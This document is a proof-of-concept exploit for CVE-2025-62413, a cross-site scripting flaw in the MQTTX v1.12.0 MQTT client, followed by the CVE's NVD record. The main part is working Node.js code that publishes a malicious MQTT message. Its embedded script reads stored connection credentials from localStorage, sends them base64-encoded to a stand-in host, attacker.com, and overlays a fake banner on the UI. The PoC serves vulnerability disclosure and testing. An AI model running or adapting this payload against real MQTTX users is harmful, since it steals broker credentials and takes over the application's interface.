CVE-2025-62413

/* * CVE-2025-62413 - MQTTX XSS Proof of Concept * * This PoC demonstrates how a malicious MQTT message payload * can trigger XSS in MQTTX v1.12.0 message viewer. * * Steps to reproduce: * 1. Set up an MQTT broker (e.g., Mosquitto, EMQX) * 2. Publish a malicious payload to a topic using any MQTT client * 3. Subscribe to the same topic in MQTTX v1.12.0 * 4. The JavaScript in the payload will execute in the MQTTX UI context */ // Malicious MQTT payload to be published to a target topic const maliciousPayload = ` <img src=x onerror=" // Attempt to access MQTTX stored credentials from localStorage var creds = JSON.stringify({ connections: localStorage.getItem('mqttx_connections'), settings: localStorage.getItem('mqttx_settings'), location: window.location.href }); // Exfiltrate data (in real attack, send to attacker-controlled server) new Image().src = 'http://attacker.com/steal?data=' + btoa(creds); // Display a fake dialog to the user document.body.innerHTML += '<div style=\"position:fixed;top:0;left:0;width:100%;height:100%;background:red;z-index:99999\"><h1>XSS Triggered - CVE-2025-62413</h1></div>'; "> `; // Using mqtt.js library to publish the malicious payload const mqtt = require('mqtt'); const client = mqtt.connect('mqtt://broker.example.com:1883'); client.on('connect', () => { console.log('[+] Connected to broker, publishing XSS payload...'); client.publish('test/topic', maliciousPayload, { qos: 1 }, (err) => { if (err) { console.error('[-] Publish failed:', err); } else { console.log('[+] Malicious payload published successfully!'); console.log('[!] When a MQTTX v1.12.0 client receives this message,'); console.log('[!] the embedded JavaScript will execute in the UI context.'); } client.end(); }); }); client.on('error', (err) => { console.error('[-] Connection error:', err); });

{"cve": {"id": "CVE-2025-62413", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:40.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MQTTX is an MQTT 5.0 desktop client and MQTT testing tool. A Cross-Site Scripting (XSS) vulnerability was introduced in MQTTX v1.12.0 due to improper handling of MQTT message payload rendering. Malicious payloads containing HTML or JavaScript could be rendered directly in the MQTTX message viewer. If exploited, this could allow attackers to execute arbitrary scripts in the context of the application UI — for example, attempting to access MQTT connection credentials or trigger unintended actions through script injection. This vulnerability is especially relevant when MQTTX is used with brokers in untrusted or multi-tenant environments, where message content cannot be fully controlled. This vulnerability is fixed in 1.12.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/emqx/MQTTX/commit/2963f78a4b3227cdb93597f546a75b75dee1059f", "source": "[email protected]"}, {"url": "https://github.com/emqx/MQTTX/security/advisories/GHSA-29gf-9r9v-j4m3", "source": "[email protected]"}]}}